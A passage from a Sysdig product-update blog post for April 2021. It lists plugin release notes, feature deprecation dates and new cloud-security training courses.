  • rules-validator: Fix output message while reading rules file.

See also: Sysdig Cloud Connector documentation.

Sysdig Secure inline scan for Github Actions

v3 is still the latest version.

Sysdig Secure Jenkins plugin

v2.1.7 was released. Below is a diff of updates since v2.1.4, which we covered last month:

  • Support some edge cases where the digest in the report doesn’t match the local digest and makes the execution fail.
  • Error with Dockerfile when the Docker daemon is running in a different host instead of in the agent.
  • Improve environment variable handling for inline-scan.

See more: Sysdig Secure Jenkins plugin homepage.

Deprecation Notices

Legacy commands audit & legacy policy events

  • The “Commands Audit” feature was deprecated in favor of Activity Audit in Nov. 2019. This feature will be completely removed from the SaaS product in April 2021.
  • Sysdig agent version 0.93+*, released in Nov. 2019, is required by the Activity Audit feature.
  • The “Policy Events” feature was deprecated in favor of the new Events feed in June 2020. This feature will be completely removed from the SaaS product in April 2021.

* Sysdig agent version 10.3.0+ is recommended.

Training & education

We released several new training courses related to cloud security this month. You can find them in our training portal, and they cover the following topics:

  • Amazon ECR Image Registry Scanning.
  • Amazon ECS & Fargate Image Scanning.
  • Cloud Security Posture Management and Compliance.
  • Threat Detection based on CloudTrail.
  • Deploying Sysdig Cloud Security for AWS.
  • Sysdig Cloud Security on AWS Workshop (which covers several of the above areas).

We’ve also released a couple of labs on image vulnerability scanning:

New website resources

Blogs

Webinars

Other resources

The post What’s new in Sysdig – April 2021 appeared first on Sysdig.

]]>